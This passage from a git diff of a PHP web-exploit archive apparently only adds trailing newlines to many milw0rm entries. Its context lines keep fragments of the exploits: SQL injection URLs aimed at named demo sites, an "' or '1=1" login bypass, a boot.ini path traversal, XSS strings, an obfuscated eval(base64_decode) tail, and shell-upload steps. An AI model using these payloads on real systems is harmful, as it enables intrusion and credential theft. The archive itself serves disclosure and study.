"L2Rpdj4iO31mbHVzaCgpOyB9IGVsc2UgeyBlY2hvICRGT1JNO30=";eval(base64_decode($GNK)); ?> -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7524.txt b/platforms/php/webapps/7524.txt index 3a6877e81..19cd05bfd 100755 --- a/platforms/php/webapps/7524.txt +++ b/platforms/php/webapps/7524.txt @@ -19,4 +19,4 @@ Online Keyword Research (download.php filename) Local File Include ============================ Greetz : www.hackteach.org members , AnGeL25dZ -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7525.txt b/platforms/php/webapps/7525.txt index 7aa1b8857..2347c7b5d 100755 --- a/platforms/php/webapps/7525.txt +++ b/platforms/php/webapps/7525.txt @@ -23,4 +23,4 @@ Extract Website (download.php filename) Local File Include ================================== Greetz : www.hackteach.org members , AnGeL25dZ -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7526.txt b/platforms/php/webapps/7526.txt index ebd92d4a5..737d89e29 100755 --- a/platforms/php/webapps/7526.txt +++ b/platforms/php/webapps/7526.txt @@ -73,4 +73,4 @@ users. [/END] -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7527.txt b/platforms/php/webapps/7527.txt index 821f354e6..bf8fb507a 100755 --- a/platforms/php/webapps/7527.txt +++ b/platforms/php/webapps/7527.txt @@ -27,4 +27,4 @@ # ################################################################ -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7528.pl b/platforms/php/webapps/7528.pl index 18428a1e0..5c6797ac7 100755 --- a/platforms/php/webapps/7528.pl +++ b/platforms/php/webapps/7528.pl @@ -150,4 +150,4 @@ sub banner { "; } -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7529.txt b/platforms/php/webapps/7529.txt index a33d9066f..175007ce2 100755 --- a/platforms/php/webapps/7529.txt +++ b/platforms/php/webapps/7529.txt @@ -29,4 +29,4 @@ Public Disclosure: Dec 19 - Seasons Greetings - - http://nukeit.org - -# milw0rm.com [2008-12-19] +# milw0rm.com [2008-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/7530.pl b/platforms/php/webapps/7530.pl index 5a5090aff..380b4a206 100755 --- a/platforms/php/webapps/7530.pl +++ b/platforms/php/webapps/7530.pl @@ -83,4 +83,4 @@ print "\n[+] Done!\n"; # EOF -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7531.txt b/platforms/php/webapps/7531.txt index 9ba2dea2a..1feb96cc9 100755 --- a/platforms/php/webapps/7531.txt +++ b/platforms/php/webapps/7531.txt @@ -23,4 +23,4 @@ Select Your Shell & Upload ! Done ! :-) --------------------------------- -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7532.txt b/platforms/php/webapps/7532.txt index d7e537a98..27f81b917 100755 --- a/platforms/php/webapps/7532.txt +++ b/platforms/php/webapps/7532.txt @@ -52,4 +52,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7537.txt b/platforms/php/webapps/7537.txt index d2fe0074f..38f5e8cec 100755 --- a/platforms/php/webapps/7537.txt +++ b/platforms/php/webapps/7537.txt @@ -33,4 +33,4 @@ # ################################################################ -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7538.txt b/platforms/php/webapps/7538.txt index 034f36ac1..b02d8114e 100755 --- a/platforms/php/webapps/7538.txt +++ b/platforms/php/webapps/7538.txt @@ -32,4 +32,4 @@ http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetail #[!] United States of Albania ############################## -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7539.txt b/platforms/php/webapps/7539.txt index 662085ac0..f8b7ad1cd 100755 --- a/platforms/php/webapps/7539.txt +++ b/platforms/php/webapps/7539.txt @@ -33,4 +33,4 @@ http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteld #[!] United States of Albania ############################## -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/754.pl b/platforms/php/webapps/754.pl index 55bcbd19d..9f4ab9df1 100755 --- a/platforms/php/webapps/754.pl +++ b/platforms/php/webapps/754.pl @@ -140,4 +140,4 @@ sub usage() exit(); } -# milw0rm.com [2005-01-13] +# milw0rm.com [2005-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/7540.txt b/platforms/php/webapps/7540.txt index fba40b982..9dbaa762b 100755 --- a/platforms/php/webapps/7540.txt +++ b/platforms/php/webapps/7540.txt @@ -14,4 +14,4 @@ Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hac DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing. -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/7541.pl b/platforms/php/webapps/7541.pl index d00115dcc..7bc9810f8 100755 --- a/platforms/php/webapps/7541.pl +++ b/platforms/php/webapps/7541.pl @@ -111,4 +111,4 @@ close(OUT); #EOF -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7542.txt b/platforms/php/webapps/7542.txt index 036c0716e..363b994a8 100755 --- a/platforms/php/webapps/7542.txt +++ b/platforms/php/webapps/7542.txt @@ -34,4 +34,4 @@ if(file_exists($filename)) ############################################################################################# -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7543.txt b/platforms/php/webapps/7543.txt index ad53bc140..0148f6316 100755 --- a/platforms/php/webapps/7543.txt +++ b/platforms/php/webapps/7543.txt @@ -16,4 +16,4 @@ Poc : \____| \___/ |_____| \__,_| _____ |_| |_| |_____| -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7544.txt b/platforms/php/webapps/7544.txt index 16b7d5384..145b0f687 100755 --- a/platforms/php/webapps/7544.txt +++ b/platforms/php/webapps/7544.txt @@ -131,4 +131,4 @@ sub Banner { ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; } -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7545.txt b/platforms/php/webapps/7545.txt index 155909b8e..ee212cb32 100755 --- a/platforms/php/webapps/7545.txt +++ b/platforms/php/webapps/7545.txt @@ -233,4 +233,4 @@ Registering a new user, the old one will be deleted. [/END] -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7546.txt b/platforms/php/webapps/7546.txt index 4aedf40ed..a2bf861a5 100755 --- a/platforms/php/webapps/7546.txt +++ b/platforms/php/webapps/7546.txt @@ -30,4 +30,4 @@ http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jo #[!] United States of Albania ############################## -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7548.php b/platforms/php/webapps/7548.php index ef3ab80e3..3d6788180 100755 --- a/platforms/php/webapps/7548.php +++ b/platforms/php/webapps/7548.php @@ -82,4 +82,4 @@ function usage() } -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7549.txt b/platforms/php/webapps/7549.txt index 840a0c2ac..c3ae1128e 100755 --- a/platforms/php/webapps/7549.txt +++ b/platforms/php/webapps/7549.txt @@ -64,4 +64,4 @@ at http://sofistic.net. -- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7551.txt b/platforms/php/webapps/7551.txt index fe1a33da4..1890e3daf 100755 --- a/platforms/php/webapps/7551.txt +++ b/platforms/php/webapps/7551.txt @@ -41,4 +41,4 @@ ------------------------------------------------------------ -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7552.txt b/platforms/php/webapps/7552.txt index 1d91b5e6e..588d62a87 100755 --- a/platforms/php/webapps/7552.txt +++ b/platforms/php/webapps/7552.txt @@ -23,4 +23,4 @@ # ############################################################### -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7553.sh b/platforms/php/webapps/7553.sh index 540763104..94a8a9901 100755 --- a/platforms/php/webapps/7553.sh +++ b/platforms/php/webapps/7553.sh @@ -101,4 +101,4 @@ f=0; until [ "$PHPAYLOAD" = "exit" ]; do read PHPAYLOAD done -# milw0rm.com [2008-12-22] +# milw0rm.com [2008-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/7557.txt b/platforms/php/webapps/7557.txt index 60a657289..11ec86e82 100755 --- a/platforms/php/webapps/7557.txt +++ b/platforms/php/webapps/7557.txt @@ -37,4 +37,4 @@ Source of pwned.html file: Once your victim has visited your evil page, You may now be able to log into their PHPMotion account, using password "password123" and their email will be "NotYourEmail@anymore.com". -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7558.txt b/platforms/php/webapps/7558.txt index 6cbeea42e..aa0f52e2b 100755 --- a/platforms/php/webapps/7558.txt +++ b/platforms/php/webapps/7558.txt @@ -23,4 +23,4 @@ Field value example: - Seasons Greetings - - http://nukeit.org - -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7559.php b/platforms/php/webapps/7559.php index 6e56a6ea4..6e919c69a 100755 --- a/platforms/php/webapps/7559.php +++ b/platforms/php/webapps/7559.php @@ -212,4 +212,4 @@ else ?> -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7560.txt b/platforms/php/webapps/7560.txt index c0280a682..6b388aac4 100755 --- a/platforms/php/webapps/7560.txt +++ b/platforms/php/webapps/7560.txt @@ -45,4 +45,4 @@ Examples of vulnerable files: Vulnerability exists at the moment of value installation %0a in COOKIEvariables. Vulnerability has been found out at the reference to a file /netcat/add.php. -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7561.txt b/platforms/php/webapps/7561.txt index 06e2d8353..04f862f56 100755 --- a/platforms/php/webapps/7561.txt +++ b/platforms/php/webapps/7561.txt @@ -27,4 +27,4 @@ Author: ahmadbady ************************************************** -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7562.txt b/platforms/php/webapps/7562.txt index b4a9b9036..49d6004bd 100755 --- a/platforms/php/webapps/7562.txt +++ b/platforms/php/webapps/7562.txt @@ -24,4 +24,4 @@ Author: ahmadbady ************************************************** -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7563.txt b/platforms/php/webapps/7563.txt index 98a7d3f7d..993b51c7f 100755 --- a/platforms/php/webapps/7563.txt +++ b/platforms/php/webapps/7563.txt @@ -20,4 +20,4 @@ Author: ahmadbady ************************************************** -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7565.txt b/platforms/php/webapps/7565.txt index a2415f693..53c1660f5 100755 --- a/platforms/php/webapps/7565.txt +++ b/platforms/php/webapps/7565.txt @@ -32,4 +32,4 @@ Samir-M > A-flow > Gess-Inject0r > Wassim-Net _______________________________________________________________________________ =============================================================================== -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7567.txt b/platforms/php/webapps/7567.txt index fca4cb68e..b0ff59bed 100755 --- a/platforms/php/webapps/7567.txt +++ b/platforms/php/webapps/7567.txt @@ -44,4 +44,4 @@ ____________________________( Greetz )_________________________________ | | | _ < | | / ___ \ | |_| | _ | |___ | |___ |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7568.txt b/platforms/php/webapps/7568.txt index 654d4664f..abe0f8f30 100755 --- a/platforms/php/webapps/7568.txt +++ b/platforms/php/webapps/7568.txt @@ -33,4 +33,4 @@ ____________________________( Greetz )_________________________________ | | | _ < | | / ___ \ | |_| | _ | |___ | |___ |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| -# milw0rm.com [2008-12-23] +# milw0rm.com [2008-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/7569.txt b/platforms/php/webapps/7569.txt index d3806ea01..7a9624e1a 100755 --- a/platforms/php/webapps/7569.txt +++ b/platforms/php/webapps/7569.txt @@ -28,4 +28,4 @@ http://[site]/[path]/pages/[shell.php]. # x0r -- w00t Zone - w00tzone.org -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7570.txt b/platforms/php/webapps/7570.txt index b9e73103a..b6ed70cb1 100755 --- a/platforms/php/webapps/7570.txt +++ b/platforms/php/webapps/7570.txt @@ -23,4 +23,4 @@ # ############################################################### -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7572.txt b/platforms/php/webapps/7572.txt index de7aaa62b..c4502b978 100755 --- a/platforms/php/webapps/7572.txt +++ b/platforms/php/webapps/7572.txt @@ -41,4 +41,4 @@ http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii( #[!] United States of Albania ############################## -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7573.txt b/platforms/php/webapps/7573.txt index 6d72d1710..0c624a6fc 100755 --- a/platforms/php/webapps/7573.txt +++ b/platforms/php/webapps/7573.txt @@ -37,4 +37,4 @@ http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewti #[!] United States of Albania ############################## -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7574.txt b/platforms/php/webapps/7574.txt index 14e617f6f..cde917c7f 100755 --- a/platforms/php/webapps/7574.txt +++ b/platforms/php/webapps/7574.txt @@ -33,4 +33,4 @@ http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=vie #[!] United States of Albania ############################## -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7575.pl b/platforms/php/webapps/7575.pl index 37c2a6947..62dc08099 100755 --- a/platforms/php/webapps/7575.pl +++ b/platforms/php/webapps/7575.pl @@ -41,4 +41,4 @@ $res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ( else{print "\n[-] Exploit Bulunamadı...\n"; } -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7576.pl b/platforms/php/webapps/7576.pl index 59bd3d6f3..389ad3d7c 100755 --- a/platforms/php/webapps/7576.pl +++ b/platforms/php/webapps/7576.pl @@ -107,4 +107,4 @@ sub usage exit; } -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7579.txt b/platforms/php/webapps/7579.txt index cb8749ac3..072cfa207 100755 --- a/platforms/php/webapps/7579.txt +++ b/platforms/php/webapps/7579.txt @@ -22,4 +22,4 @@ Patch 0.8.61: Dec 19 - Seasons Greetings - - http://nukeit.org - -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7580.txt b/platforms/php/webapps/7580.txt index f61cb89df..c4df9defe 100755 --- a/platforms/php/webapps/7580.txt +++ b/platforms/php/webapps/7580.txt @@ -14,4 +14,4 @@ dialog.php?dialog=foo&module= - Seasons Greetings - - http://nukeit.org - -# milw0rm.com [2008-12-24] +# milw0rm.com [2008-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/7586.txt b/platforms/php/webapps/7586.txt index 7f4814aa3..7010c7dc3 100755 --- a/platforms/php/webapps/7586.txt +++ b/platforms/php/webapps/7586.txt @@ -16,4 +16,4 @@ # Nazrek, Free-Hack and Sys-Flaw ############################################################################## -# milw0rm.com [2008-12-28] +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/7587.txt b/platforms/php/webapps/7587.txt index 9a61a6593..d7b1e1a1d 100755 --- a/platforms/php/webapps/7587.txt +++ b/platforms/php/webapps/7587.txt @@ -33,4 +33,4 @@ d8e423..ecc... ;-) \> Str0ke Securitycode Team StaKer -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7606.txt b/platforms/php/webapps/7606.txt index d30a64c23..99dd5c672 100755 --- a/platforms/php/webapps/7606.txt +++ b/platforms/php/webapps/7606.txt @@ -15,4 +15,4 @@ Dork : "Powered by FubarForum v1.6" Greetz to: # Corenamed, Unsecured, Esedark, pax0r, zrallter, th0r... and TerminalHacker -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7607.pl b/platforms/php/webapps/7607.pl index cb713516f..cd9402dc5 100755 --- a/platforms/php/webapps/7607.pl +++ b/platforms/php/webapps/7607.pl @@ -89,4 +89,4 @@ my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d". } -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7611.php b/platforms/php/webapps/7611.php index de0714667..4b0afc472 100755 --- a/platforms/php/webapps/7611.php +++ b/platforms/php/webapps/7611.php @@ -225,4 +225,4 @@ else ?> -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7612.txt b/platforms/php/webapps/7612.txt index 7ebe9c447..3ab3c6fd4 100755 --- a/platforms/php/webapps/7612.txt +++ b/platforms/php/webapps/7612.txt @@ -12,4 +12,4 @@ or !! You can use this for inj. !! Thans for Ozan! -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7614.txt b/platforms/php/webapps/7614.txt index c60dfcdbe..a8f76b769 100755 --- a/platforms/php/webapps/7614.txt +++ b/platforms/php/webapps/7614.txt @@ -24,4 +24,4 @@ Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^ Greetz: I Miss You... -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7615.txt b/platforms/php/webapps/7615.txt index 1ae07706a..4898852a7 100755 --- a/platforms/php/webapps/7615.txt +++ b/platforms/php/webapps/7615.txt @@ -19,4 +19,4 @@ Put as username and password the following sql code: ' or '1=1 Greetz: Anna <3 -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7616.txt b/platforms/php/webapps/7616.txt index f8646b72a..22908e487 100755 --- a/platforms/php/webapps/7616.txt +++ b/platforms/php/webapps/7616.txt @@ -19,4 +19,4 @@ Put as username and password the following sql code: ' or '1=1 Greetz: Visit My Site Pls :P -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7619.txt b/platforms/php/webapps/7619.txt index 14a08aabf..6b1f5d45b 100755 --- a/platforms/php/webapps/7619.txt +++ b/platforms/php/webapps/7619.txt @@ -28,4 +28,4 @@ http://site.com/eDNews_view.php?newsid=-99/**/union/**/select/**/1,2,concat(user ------- young iranian h4ck3rz -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7620.txt b/platforms/php/webapps/7620.txt index f55bea7a6..400751033 100755 --- a/platforms/php/webapps/7620.txt +++ b/platforms/php/webapps/7620.txt @@ -73,4 +73,4 @@ Example: 2 Go to url yourserver.com/upload.php and put to the textarea adres of website and Click OWNED 3 Now go to url your file target.com/galeria/own.php -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7621.txt b/platforms/php/webapps/7621.txt index 0d789945e..40729b31d 100755 --- a/platforms/php/webapps/7621.txt +++ b/platforms/php/webapps/7621.txt @@ -34,4 +34,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7622.txt b/platforms/php/webapps/7622.txt index 91f6b4ecc..d89de80e9 100755 --- a/platforms/php/webapps/7622.txt +++ b/platforms/php/webapps/7622.txt @@ -53,4 +53,4 @@ So, if install.php is not deleted, we can inject php code, and this bug can beco [/END] -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/7624.txt b/platforms/php/webapps/7624.txt index b341dbeac..f697a93b1 100755 --- a/platforms/php/webapps/7624.txt +++ b/platforms/php/webapps/7624.txt @@ -15,4 +15,4 @@ Put as username and password the following sql code: ' or '1=1 I'll Be A C I D A L !!! -# milw0rm.com [2008-12-30] +# milw0rm.com [2008-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/7625.txt b/platforms/php/webapps/7625.txt index 300ac5e9f..25efee031 100755 --- a/platforms/php/webapps/7625.txt +++ b/platforms/php/webapps/7625.txt @@ -70,4 +70,4 @@ http://[target]/[path]/index.php?bit=../../../../boot.ini%00 ############################################################################################# -# milw0rm.com [2008-12-30] +# milw0rm.com [2008-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/7626.txt b/platforms/php/webapps/7626.txt index b97eeed39..a5add2325 100755 --- a/platforms/php/webapps/7626.txt +++ b/platforms/php/webapps/7626.txt @@ -23,4 +23,4 @@ http://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@ Greets: Children Of Ghaza....And My Sweety Girl <3 -# milw0rm.com [2008-12-30] +# milw0rm.com [2008-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/7628.txt b/platforms/php/webapps/7628.txt index 3f154603b..a637a494d 100755 --- a/platforms/php/webapps/7628.txt +++ b/platforms/php/webapps/7628.txt @@ -108,4 +108,4 @@ Greetz go out to the people who know me. Xia Shing Zee =============================================================== -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7629.txt b/platforms/php/webapps/7629.txt index bba083309..426decd4c 100755 --- a/platforms/php/webapps/7629.txt +++ b/platforms/php/webapps/7629.txt @@ -32,4 +32,4 @@ # ######################################################################################################################## -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7631.txt b/platforms/php/webapps/7631.txt index f660898d1..3c36f3dba 100755 --- a/platforms/php/webapps/7631.txt +++ b/platforms/php/webapps/7631.txt @@ -20,4 +20,4 @@ livedemo :http://www.musicza.com/homenew//sticker/sticker.php?id=1%27+UNION+SELE Special Thx : THD [Thaishadow] -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7633.txt b/platforms/php/webapps/7633.txt index b1e969384..98e1cf499 100755 --- a/platforms/php/webapps/7633.txt +++ b/platforms/php/webapps/7633.txt @@ -22,4 +22,4 @@ name="submit" value="Submit" /> With this csrf you can change the admin pass ^ ^ -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7635.txt b/platforms/php/webapps/7635.txt index 8d1018184..487a5fd66 100755 --- a/platforms/php/webapps/7635.txt +++ b/platforms/php/webapps/7635.txt @@ -18,4 +18,4 @@ bview.asp?id=1+union+select+0,useradmin,2,3,4,passadmin,6,7,8+from+admin ############################################## Special:PARS! & Equilibrium & KaYZeRSoZe & ALL Cyber-Warrior -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7636.pl b/platforms/php/webapps/7636.pl index 1e014143a..125acc430 100755 --- a/platforms/php/webapps/7636.pl +++ b/platforms/php/webapps/7636.pl @@ -37,4 +37,4 @@ else { ?> -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7638.txt b/platforms/php/webapps/7638.txt index 20011d25a..aceb79811 100755 --- a/platforms/php/webapps/7638.txt +++ b/platforms/php/webapps/7638.txt @@ -18,4 +18,4 @@ The location of the file can also easily be found by using your browser's "view ===<3=== lots of lub to (irc.)r00tsecurity.org and all of #r00tsecurity -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7639.txt b/platforms/php/webapps/7639.txt index 613d9ba63..c98b96a1c 100755 --- a/platforms/php/webapps/7639.txt +++ b/platforms/php/webapps/7639.txt @@ -26,4 +26,4 @@ Author: ahmadbady ************************************************* -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7640.txt b/platforms/php/webapps/7640.txt index 6d9b7b584..5db0afaf9 100755 --- a/platforms/php/webapps/7640.txt +++ b/platforms/php/webapps/7640.txt @@ -49,4 +49,4 @@ [!] Solution...: upgrade to version 3.4.0 -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7641.txt b/platforms/php/webapps/7641.txt index f20c62d4f..05099c703 100755 --- a/platforms/php/webapps/7641.txt +++ b/platforms/php/webapps/7641.txt @@ -16,4 +16,4 @@ http://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname, ---- young iranian h4ck3rz -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7642.txt b/platforms/php/webapps/7642.txt index 3cd273019..36a91facb 100755 --- a/platforms/php/webapps/7642.txt +++ b/platforms/php/webapps/7642.txt @@ -19,4 +19,4 @@ pass:[whatever] --- young iranian h4ck3rz -# milw0rm.com [2009-01-01] +# milw0rm.com [2009-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/7644.txt b/platforms/php/webapps/7644.txt index fd920fda5..3208709c5 100755 --- a/platforms/php/webapps/7644.txt +++ b/platforms/php/webapps/7644.txt @@ -71,4 +71,4 @@ http://www.q-seek.com/pictures/14_2009-01-02-02-25-03.php [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-02] +# milw0rm.com [2009-01-02] \ No newline at end of file diff --git a/platforms/php/webapps/7645.txt b/platforms/php/webapps/7645.txt index 52b20daf1..503f91001 100755 --- a/platforms/php/webapps/7645.txt +++ b/platforms/php/webapps/7645.txt @@ -71,4 +71,4 @@ http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.ph [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-01-02] +# milw0rm.com [2009-01-02] \ No newline at end of file diff --git a/platforms/php/webapps/7648.txt b/platforms/php/webapps/7648.txt index 7edaf02a8..f303b550f 100755 --- a/platforms/php/webapps/7648.txt +++ b/platforms/php/webapps/7648.txt @@ -30,4 +30,4 @@ http://127.0.0.1/path/index.php/>"> Author: ahmadbady --------------------- -# milw0rm.com [2009-01-02] +# milw0rm.com [2009-01-02] \ No newline at end of file diff --git a/platforms/php/webapps/7650.php b/platforms/php/webapps/7650.php index e86b5b9f6..c86658774 100755 --- a/platforms/php/webapps/7650.php +++ b/platforms/php/webapps/7650.php @@ -87,4 +87,4 @@ echo "[+] Username: " . brute ($host, $path, "username", $key) . "\n". ?> -# milw0rm.com [2009-01-03] +# milw0rm.com [2009-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/7653.txt b/platforms/php/webapps/7653.txt index 87904d348..0f684157d 100755 --- a/platforms/php/webapps/7653.txt +++ b/platforms/php/webapps/7653.txt @@ -78,4 +78,4 @@ And why in the world isnt it used?! ~END~ -# milw0rm.com [2009-01-03] +# milw0rm.com [2009-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/7657.txt b/platforms/php/webapps/7657.txt index 6219b3064..b9e40d761 100755 --- a/platforms/php/webapps/7657.txt +++ b/platforms/php/webapps/7657.txt @@ -11,4 +11,4 @@ | http://www.youtube.com/watch?v=SY1SwqLOC3c | +--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+ -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7658.pl b/platforms/php/webapps/7658.pl index 9e4e15776..7f678805f 100755 --- a/platforms/php/webapps/7658.pl +++ b/platforms/php/webapps/7658.pl @@ -146,4 +146,4 @@ sub about { MainLoop; -# milw0rm.com [2009-01-04] +# milw0rm.com [2009-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7659.txt b/platforms/php/webapps/7659.txt index c0d31bb81..5c476bc08 100755 